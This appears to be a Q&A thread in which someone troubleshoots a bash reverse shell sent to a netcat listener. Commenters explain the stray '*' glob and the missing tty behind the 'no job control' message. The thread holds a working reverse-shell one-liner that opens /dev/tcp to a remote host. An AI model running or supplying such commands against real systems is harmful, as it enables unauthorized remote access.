# bash error reverse shell no job control in this shell

Tags: bash, shell, netcat

I'm listening for a connection with:
`nc -nlvp 4444`

and invoking the reverse shell payload with:

```
bash -i >& /dev/tcp/xx.xx.x.xx/4444 0>&1 *
```

My `nc` listener then gives me:

```
listening on [any] 4444 ...
connect to [xx.xx.x.xx] from (UNKNOWN) [xx.xx.x.xx] 55759
bash: no job control in this shell
alldocs.php: line 1: *Everyones: command not found
```

What gives? How can I get it to invoke an actual reverse shell?

Thank you.

Comment: The `*` at the end of the line could be the problem.

Comment: "No job control in this shell" isn't an error, as such. You can have a perfectly functional shell with no job control (well, "functional" except for the lack of job control, of course).

Comment: and, err, what do you think the `*` is going to do? (Hint: It's going to be replaced with a list of filenames *by your local shell before the new copy of `bash` is even started*; and that list is going to be executed as a command, so its effect depends on the files present in your local directory).

Comment: ...also note that list of local filenames is sorted by your current collation order, and in most locales, a file named `*Everyones` (if you had a file thus named in your current directory) will be very high in the aforementioned order, thus going towards the top of the list -- and thus having a high likelihood of becoming the first part of said command.

Comment: Can you issue commands like id, whoami, or ls? Then you have a working reverse shell, but no tty. This is why you get this warning.